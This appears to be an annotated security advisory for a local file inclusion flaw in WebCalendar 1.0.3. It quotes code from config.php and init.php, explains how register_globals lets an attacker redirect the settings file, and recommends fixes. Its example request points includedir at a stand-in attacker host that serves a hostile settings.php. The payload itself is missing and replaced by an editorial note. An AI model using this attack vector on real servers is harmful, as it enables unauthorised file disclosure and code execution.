|
Version: WebCalendar 1.0.3
=0D
Type: Arbitrary file read / local file inclusion (an attacker-controlled settings.php chooses the file that init.php includes)
=0D
Description:
-----------------------------
includes/config.php (around line 64):
=0D
// If $includedir is not initialised earlier in config.php (not visible here),
// register_globals=On lets a request parameter (?includedir=...) set it, so the
// path being opened is attacker-controlled. The `@` hides fopen() failures and the
// third argument (use_include_path=true) only affects relative paths; with
// allow_url_fopen=On an http:// value fetches settings.php from a remote host.
if ( ! empty ( $includedir ) )
$fd = @fopen ( "$includedir/settings.php", "rb", true );
=0D
......
=0D
// Slurp the whole settings file into $data, then split it into lines.
// Nothing checks that fopen() succeeded: on PHP 4/5 feof() on a non-resource
// only emits a warning and returns a falsy value, so a failed open does not end
// the loop cleanly - guard on $fd !== false before reading.
// The content is trusted as-is; when it came from an attacker-controlled
// $includedir every parsed setting below is attacker-controlled.
while ( ! feof ( $fd ) ) {
$data .= fgets ( $fd, 4096 );
}

$configLines = explode ( "\n", $data );
=0D
for ( $n = 0; $n < count ( $configLines ); $n++ ) {=0D
......
$settings[$matches[1]] = $matches[2];=0D
......
=0D
// Copied straight from the parsed settings file, so it is attacker-controlled
// whenever settings.php was. It is later used as a path fragment in include_once
// (includes/init.php); validate it against an allow-list of known user_inc
// files (or at least reduce it with basename()) before it reaches include_once.
$user_inc = $settings['user_inc'];
......
=0D
includes/init.php:
// $user_inc comes from settings.php without validation. The "includes/" prefix
// does not stop traversal ("../"), so a hostile settings file can make this
// include an arbitrary local file - disclosing its contents, or executing it if
// it contains PHP code. Check $user_inc against an allow-list before including.
include_once "includes/$user_inc";
=0D
Example:
---------------------------------------
index.php?includedir=http://attacker_host
where attacker_host serves a file settings.php (config.php fetches it with fopen(), which for an http:// URL requires allow_url_fopen = On) whose content is:
=0D
"
[payload lost in extraction: the PHP tags were stripped and only a trailing `';` and `?>` survive. From the parser shown above, the served settings.php must contain a line that config.php stores as $settings['user_inc']; because init.php includes "includes/$user_inc" verbatim, a "../"-prefixed value escapes the includes/ directory and selects the local file that gets read/included.]
"
=0D
Requirements
register_globals = On (so the includedir request parameter becomes $includedir); the remote-host example additionally needs allow_url_fopen = On.